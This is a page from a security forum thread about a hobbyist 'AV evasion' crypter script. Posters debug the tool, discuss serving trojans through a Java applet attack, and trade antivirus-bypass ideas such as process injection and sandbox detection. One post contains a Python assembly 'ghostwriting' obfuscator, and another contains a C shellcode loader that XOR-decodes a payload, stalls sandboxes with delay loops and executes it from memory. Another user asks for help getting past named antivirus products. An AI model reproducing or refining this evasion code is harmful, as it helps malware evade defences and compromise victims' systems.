Page 11 of 12 FirstFirst ... 9101112 LastLast
Results 101 to 110 of 114

Thread: [script] for AV evasion

  1. #101
    Member
    Join Date
    Jan 2010
    Posts
    54

    Default Re: [script] for AV evasion

    Quote Originally Posted by ShadowMaster View Post
    Open a new term
    Type "dos2unix crypter.py && dos2unix javaAttack.sh" in /opt/metasploit/msf3/
    and you're done.
    Yer i read that but i thought it would have already be done to the script :/ confusing but owell. Thanks for clearing that up ShadowMaster

  2. #102
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    First off, great script. (BTW if anyone here has any perl coding skills, I'm writing an ASM ghostwriting automation tool in perl. Any help would be appreciated. that should help to make FUD paylaods.)
    Second off I get this errror on part two. Also, I'm not entirely sure how to integrate part two into a pentest. All this does is set up the site and java so that when a user browses to my ip from a spoofed DNS response he will be pwned?
    [*] Stripping out the debugging symbols...[*] Moving trojan horse to web root...
    **************************************
    1) apache server
    2) java applet attack
    3) create evil PDF
    **************************************
    Select an attack (1-n):2
    Traceback (most recent call last):
    File "./crypter.py", line 137, in <module>
    subprocess.Popen(args=["gnome-terminal", "--command=sh /opt/metasploit/msf3/javaAttack.sh"]).pid
    File "/usr/lib/python2.6/subprocess.py", line 633, in __init__
    errread, errwrite)
    File "/usr/lib/python2.6/subprocess.py", line 1139, in _execute_child
    raise child_exception
    OSError: [Errno 2] No such file or director


    I've been getting this output and trying to debug, but so far I have no idea whatt's causing it. Do you?
    You right part 2 isn't really useful in a pentest. I don't do this as a job. It's just a hobby so I didn't really think about that.

    As for your error, did you set execution permission for javaAttack.sh and is it in your metasploit directory ?
    If you did and it still isn't working maybe changing
    Code:
    subprocess.Popen(args=["gnome-terminal", "--command=sh /opt/metasploit/msf3/javaAttack.sh"]).pid
    to
    Code:
    subprocess.call('sh javaAttack.sh')
    will work.
    This is a strange error and you are the first one to have it.

    I don't think I will able to help with your ghostwriting tool as I don't know so much about asm and I haven't really done much in perl before.
    I'm kind of trying to learn more asm cause I find you need it a lot.

    To make my script FUD again I thought to write a c++ program that would call a process in suspend mode and then write the shellcode to the process and resume the process. This is kind of a known method to AV's so I would need to obfuscate my API calls.

    I also think that encrypting your shellcode on disk and decrypting it in memory is not good enough anymore. AV sandboxes really step step per step trough your program until they find something. Ghostwriting asm is probably the best option.

    Also this seems interesting: http://funoverip.net/2012/06/antivir...evasion-part2/

    Any more ideas ?
    Last edited by LHYX1; 07-11-2012 at 05:52 AM.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  3. #103
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    So I read that paper, and it was pretty awesome. If you can use that in your script it would be pretty cool. A couple things. 1) Allow for just compiling and placing of the trojan in root. Do not force the listener to be started. In a pentest with phishing, it is annoying to have to cancel the listener every time, instead of continuing down the custom payload path with your executable.

    2) when I finally finish my ASM GW script, allowing for default payload obfuscation, integration into your script would be very cool. Do not let this stop you from writing your own, I have several py ghostwriting scripts I can give you to help you get started.

    3) My javaAttack.sh is obviously both executable and found in the dir, but even when I change your line to the suggested one it fails with the same error.

    4) Have you looked at using different wrappers for the shellcode? usually it's the wrapper that is detected and not the sc. See: http://www.mattandreko.com/2012/02/u...bypass-av.html for several cool examples.

    5) Maybe you can have a c/c++ prog inject the shellcode to a running process or something. Again, many methods exist for this.

    6) Have you checked out shellcodeexec? You should. You may find it cool.

    Let me know what you think of all these.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  4. #104
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    1)I tested the method of connecting to 127.0.0.1:445 to check that your malware is running in a sandbox or not and it worked on avira and some other av's. Altough it doesn't bypass all of them. I know av's don't like socket API's so maybe I'll try to hide them. I'll post the code for this tomorrow. I will allow for just compiling and placing the exe in /root in the next version of the script.

    2)Yes it would be really cool to integrate the scripts. Also I would really appreciate it if you would share one of your py GW scripts. I think I could learn a lot from them.

    3) Tomorrow I'll take a deeper look at the error. I'll finally have some time to work on the script

    4)I'll look into it. Altough I don't really like to use c# for this. You would always need a windows machine to compile.

    5)I'll try some different methods and see wich one is the best.

    6)I'll also check it tommorow.
    Last edited by LHYX1; 07-13-2012 at 05:47 AM.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  5. #105
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    Code:
    import random
    
    
    reg32 = ["EAX", "EBX", "ECX", "EDX", "ESP", "EBP", "ESI" ,"EDI"]
    reg16 = [['AL', 'AH'], ['BL', 'BH'], ['CL', 'CH'],[ 'DL', 'DH']]
    BitWiseOps = ["And", "Or", "XOr", "Mov"]
    StackOps = ["Push", "Pop"]
    Xors = [["XOR {DREG}, {DREG}", "MOV {REG}, {DREG}"],
                ["SUB {REG}, {REG}"],
                ["OR {REG}, ffffffffh", "Push {DREG}", "MOV {DREG}, ffffffffh", "SUB {REG}, {DREG}", "Pop {DREG}"],
                ["OR {REG}, ffffffh", "AND {REG}, 55555555h", "AND {REG}, AAAAAAAAh"]]
    Movs = [["OR {REG}, ffffffffh", "AND {REG}, {amount}"], ["XOR {REG}, {REG}", "ADD {REG}, {amount}"]]
    
    def GhostWriter():
        file = open(sys.argv[1], 'r')
        fileLines = file.read()
        fileLines = fileLines.splitlines()
        for i in range(len(fileLines)):
            l = fileLines[i]
            if len(l) < 4:
                print "invalid line is less than 5 characters long :" + l
                #break;
            elif l[:1] == "//":
                print "comment line: " + l
            else:
                if l[:3] == 'Pop' or l[:4] == 'Push':
                    l = stack(l)
                else :
                    l = bitWiseObfuscation(l)
                fileLines[i] = l
    
        newName = sys.argv[1]#.split('.')
        if len(newName) > 1 : newName = newName.replace(".", "REMADE.", 1)
        else: newName = sys.argv[1] + "REMADE"
        newFile = open(newName, 'w')
        for l in fileLines: newFile.write(l)
        newFile.close()
        print "file saved as: " + newName
    
    def bitWiseObfuscation(l):
        cmds = readCommand(l)
        print cmds
        if len(cmds) == 3:
            if cmds[0].upper() == "XOR" and cmds[1].upper() == cmds[2].upper():
                newRegister = getRandomRegister(cmds[1].upper())
                newCommands = Xors[random.randint(0,3)]
                finalCommand = ""
                for c in newCommands: finalCommand += c + "\n"
                finalCommand = finalCommand.replace('{DREG}', newRegister)
                finalCommand = finalCommand.replace('{REG}', cmds[1].upper())
                finalCommand = finalCommand.replace('{REG}', cmds[1].upper())
                return finalCommand
            elif cmds[0].upper() == "MOV":
                newCommands = Movs[random.randint(0,1)]
                finalCommand = ""
                for c in newCommands: finalCommand += c + "\n"
                finalCommand = finalCommand.replace('{REG}', cmds[1].upper())
                finalCommand = finalCommand.replace('{amount}', cmds[2].upper())
                return finalCommand
        return l + "\n"
    
    def getRandomRegister(register):
        newRegister = reg32[random.randint(0,7)]
        if newRegister != register.upper(): return newRegister
        else: return getRandomRegister(register)
    
    def stack(command):
        return command
    
    def readCommand(command):
        commandParts = command.rsplit()
        for i in range(len(commandParts)):
            if len(commandParts[i]) == 3 and ',' in commandParts[i]:
                commandParts[i] = commandParts[i].replace(',', '')
            elif len(commandParts) == 2 and  ',' in commandParts[i] and i == 1:
                commandParts = [commandParts[0]] + commandParts[1].split(',')
        return commandParts
        
    if __name__ == "__main__":
    	import sys
    	if len(sys.argv) < 2:
                print "please write a path to a file as the first parameter (after the script name)"
    	else:
                GhostWriter()
    This is one technique, albeit not the one I am using for my perl script. I'll ask the author of the second one for permission to post and if he says yes I will. I look forward to the next version of your script. Edit the first psot and provide a link in the next post as well.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  6. #106
    Just burned his ISO
    Join Date
    May 2011
    Posts
    3

    Default Re: [script] for AV evasion

    nice tool , ive modified loop values to 105000 but yet it is detected by kaspersky , avira , f-secure , bitdefender please have a look to update it so it may bypass all of them. I would say to make it dynamic ghostwriting .

    Regards
    Scorpoin

  7. #107
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    As I've been working on ASM ghostwriting for the past many months, I can tell you this with some authority. To do anything more complicated than xor or static string replacement is *HARD*. THis is not something that'll happen overnight.
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  8. #108
    Just burned his ISO
    Join Date
    May 2011
    Posts
    3

    Default Re: [script] for AV evasion

    Thanks for your prompt response. @Shadow and @LHYX1 could you guys please help me out what do I need to change to avoid this detection since it is scantime based not runtime based encryption. @LHYX1 Ive edited your script structure.c to fulfill my need.

    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <windows.h>
    #include <time.h>
    
    int main(){
    char junkA []= %s;
    unsigned char payload[] = %s;
    char junkB []= %s;
    unsigned char key = %s;
    unsigned int PAYLOAD_LENGTH = %s;
    int i;
    unsigned char* exec = (unsigned char*)VirtualAlloc(NULL, PAYLOAD_LENGTH/2 ,0x1000,0x40);
    unsigned char* unpack = (unsigned char*)VirtualAlloc(NULL, PAYLOAD_LENGTH/2, 0x1000,0x40);
    int z, y;
    int devide;
    int x = 0;
    time_t start_time, cur_time;
    
    time(&start_time);
    do
    {
    time(&cur_time);
    }
    while((cur_time - start_time) < 2);
    
    for(i=0; i<PAYLOAD_LENGTH; i++)
    {
    devide = %s
    if(devide == 0)
    {
    unpack[x]=payload[i];
    x++;
    }
    }
    
    for(i=0; i<PAYLOAD_LENGTH/2; i++)
    {
        for(z=0;z<7000;z++)
        {
            for(y=0;y<700;y++)
            {
                    exec[i]=unpack[i]^key;
     }
        }
    }
    
    ((void (*)())exec)();
    
    return 0;
    }
    Please share you valuable thoughts and do let me know some guide or something where I can learn more. If possible let me know if possible to make changes to current script. I have not make any changes to cyrpter.py .


    Regards
    scorpoin

  9. #109
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: [script] for AV evasion

    @LHYX1
    Sorry for the thread hijack, but wanted you to check this out: http://www.backtrack-linux.org/forum...ad.php?t=51129
    World Domination is such an ugly phrase. I prefer the term World Optimization.

  10. #110
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [script] for AV evasion

    @ info:
    if anyone hear .. the ""package mingw32"" is the DEFAULT install in BT5-R3!

Page 11 of 12 FirstFirst ... 9101112 LastLast

Similar Threads

  1. Script for simple AV evasion (tested on AVG, Avast, Emisoft)
    By LHYX1 in forum BackTrack 5 General Topics
    Replies: 16
    Last Post: 05-01-2012, 09:26 PM
  2. Script for simple AV evasion (tested on AVG, Avast, Emisoft)
    By LHYX1 in forum BackTrack 5 Beginners Section
    Replies: 1
    Last Post: 07-16-2011, 02:16 PM
  3. Snort Signature Evasion with Metasploit
    By T0XIC in forum BackTrack 5 Videos
    Replies: 6
    Last Post: 07-01-2011, 12:21 PM
  4. Advanced antivirus evasion techniques
    By AzraelSepultura in forum Beginners Forum
    Replies: 4
    Last Post: 03-01-2011, 06:57 AM
  5. Firewall evasion techniques?
    By knithx in forum OLD Pentesting
    Replies: 2
    Last Post: 09-21-2009, 06:46 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •